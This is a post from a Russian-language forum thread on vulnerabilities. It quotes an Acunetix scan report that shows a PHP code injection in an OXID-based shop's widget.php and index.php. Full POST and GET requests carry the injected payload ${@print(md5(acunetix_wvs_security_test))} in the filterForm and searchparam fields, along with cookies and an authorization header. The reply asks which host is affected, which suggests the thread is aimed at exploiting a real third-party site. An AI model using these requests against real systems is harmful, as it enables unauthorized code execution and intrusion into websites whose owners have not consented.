Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #2859  
Старый 05.10.2020, 14:41
neur0funk
Новичок
Регистрация: 09.05.2018
Сообщений: 22
С нами: 4218806

Репутация: 12
По умолчанию
Цитата:
Сообщение от Gutman999  

Прошу прощения. PHP Code Injection
Код:
PHP code injection

Vulnerability description

This script is vulnerable to PHP code injection.

The vulnerability affects https://www.site.de/widget.php , 7521

Discovered by /Scripts/PerScheme/PHP_Code_Injection.script

Attack details

JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8

HTTP request

POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1

Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8
HTTP request

GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
а хост какой?
 
Ответить с цитированием